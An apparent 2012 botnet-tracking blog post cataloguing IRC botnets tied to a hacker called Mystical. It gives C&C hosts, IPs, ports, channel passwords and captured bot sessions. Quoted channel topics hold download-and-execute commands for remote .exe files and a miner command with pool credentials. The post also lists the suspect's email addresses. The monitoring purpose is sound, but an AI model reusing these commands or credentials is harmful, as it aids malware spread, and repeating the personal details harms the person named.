Month: September 2012

Mystical Megapost (Botnets of all types) (Hosted by Ukraine Ukrainian Internet Names Center Ltd and Netherlands Maasdijk Worldstream)

As Mystical has recently been banned from hackforums, I thought I would make an informative megapost of the botnets he has used or is currently using.
Domains: Bighecker.co 1212Mystic0801.info Sonic4us.com Sonic4me.com img196-imageshack.us rs-booter.com modtech360.info 307dice.com powerbot24.com img90-imageshack.com imageshells.com bighecks.net
Emails used for registration: hlolgame@aim.com mikeydoc@hotmail.com #plug this into facebook to see his profile highroller098765@hotmail.com mikeshosting@yahoo.com bram.fadzulani@mail.com ...

vandersand.no-ip.biz (Insomnia ircbot hosted by United States Clarks Summit Volumedrive)

Resolved vandersand.no-ip.biz to 199.115.230.138
Server: vandersand.no-ip.biz
Port: 6654
Channel: #Insomnia
Channel password: frosty
* Topic for #Insomnia is: .up hxxps://dl.dropbox.com/u/21829907/botseller.exe 449C6FB8390C7148B075A52EBEBAB4F5
* Topic for #Insomnia set by lucky at Thu Sep 06 22:08:10 2012
Botnick: {IT|XP-32a}uwryxvf
While I was in the channel he downloaded a bitcoin miner Dextermania.exe  hxxp://versx.net/x/bcm/bitcoin-miner.exe http://pool.bitclockers.com:8332 -u Dexter -p 19930924
Hosting ...

cmjc.no-ip.biz (Athena ircbot hosted by France Roubaix Ovh Systems)

Found more Athena nets
Resolved cmjc.no-ip.biz to 5.39.44.120
Server: cmjc.no-ip.biz
Port: 6667
Channel: #kam
#kam             14      [+smntrVCT]
Channel: #vanrikki
Password: wiitasauce3991
#vanrikki        44      [+sntrVCTk]
Server is one of those used by cmjc.whhcd.info
I’m not sure why they used a no-ip for these bots, anyone can get that suspended easily. The servers host lots of skids, ...

cmjc.whhcd.info (Athena ircbot hosted by France Roubaix Ovh Systems)

Resolved cmjc.whhcd.info to 5.39.44.120
Resolved cmjc.whhcd.info to 176.31.33.45
Resolved cmjc.whhcd.info to 46.105.36.229
Server: cmjc.whhcd.info
Port: 6667
Channel: #MuustaHF
Channel password: hejij3cdp
Opers: Ddos
* [Ddos] (Ddos@I.Will.DDOS.Your.Ass): Ddos
* [Ddos] is a registered nick
* [Ddos] services.whhcd.info :Services for IRC Networks
* [Ddos] idle 158:10:19, signon: Wed Aug 29 23:26:30
* [Ddos] End of WHOIS list.
MuustaHF ...

gtfo.myprivatefile.com (irc botnet hosted in United States Clifton Park Search Guide Inc)

Resolved : [gtfo.myprivatefile.com] To [184.106.87.139]
Resolved : [gtfo.myprivatefile.com] To [66.152.109.69 13]
Resolved : [gtfo.myprivatefile.com] To [69.16.143.69 13]
Remote Host Port Number
gtfo.myprivatefile.com 1337
PASS google_cache1tfsg4.tmp
NICK X[USA][XP-SP2]150351
USER 9092 “” “lol” :9092
JOIN #swarm swarm
NICK {NEW}X[USA][XP-SP2]020911
USER 0441 “” “lol” :0441
NICK X[USA][XP-SP2]075732
USER 5218 “” “lol” :5218
hosting infos: http://whois.domaintools.com/66.152.109.69

blah.swapixtreme.com (irc botnet hosted in United Kingdom Vooservers Ltd)

Resolved : [blah.swapixtreme.com] To [91.227.221.217]
Clients: I have 308 clients and 1 servers
Local users: Current Local Users: 308 Max: 1
Global users: Current Global Users: 309 Max: 1105
Remote Host Port Number
blah.swapixtreme.com 7878
NICK [GSA]-274266
USER hhzegr 0 0 :[GSA]-274266
USERHOST [GSA]-274266
MODE [GSA]-274266 +xt
JOIN #b imallowed2020
hosting infos: http://whois.domaintools.com/91.227.221.217

kca.hopto.org (irc botnet hosted in Turkey Balikesir Turk Telekomunikasyon Anonim Sirketi)

Resolved : [kca.hopto.org] To [88.255.116.48]
Server: 88.255.116.48:1453
Nick: new[iRooT-XP-AUT]990453
Username: 9904
Server Pass: KCA
Joined Channel: #XXX with Password KCA
Channel Topic for Channel #XXX: “.dwl http://www.pso-k.org/yes.exe .lan .html”
Private Message to Channel #XXX: “^C04[HTML Infector]: ^C09Html Files Infected!”
Private Message to Channel #XXX: “[Download]: Executed Successfully”
Private Message to Channel #XXX: “^C04[LAN Spread]: ^C09Spreading ...

deuxexhre.org (ngrbot hosted by Romania Voxility)

deuxexhre.org resolved to 37.221.160.38
Server: deuxexhre.org
Port: 1090
Password: romeo
Channel: ##str
Channel Password: romeo
Channel topic:
* Topic for ##str is: *mdns http://alfonsoelpidio.com/hosts
* Topic for ##str set by drek0 at Wed Aug 29 11:22:21 2012
Bot sample from http://oberheimdmx.blogspot.co.uk/2012/08/dorkbot-falso-mensaje-de-amorenlinea.html
Hosting infos: http://whois.domaintools.com/37.221.160.38